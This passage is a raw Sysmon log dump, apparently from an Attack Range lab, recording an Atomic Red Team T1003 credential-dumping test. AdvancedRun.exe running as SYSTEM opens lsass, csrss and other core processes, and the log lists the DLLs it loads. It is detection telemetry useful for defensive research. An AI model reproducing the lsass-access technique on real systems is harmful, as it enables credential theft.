s\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003979920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003979918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003979910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.262{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.262{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.262{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.262{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003979861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.246{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003979860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.246{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.246{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979858Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.231{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.231{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.231{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.231{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.200{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.200{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.184{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.168{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating 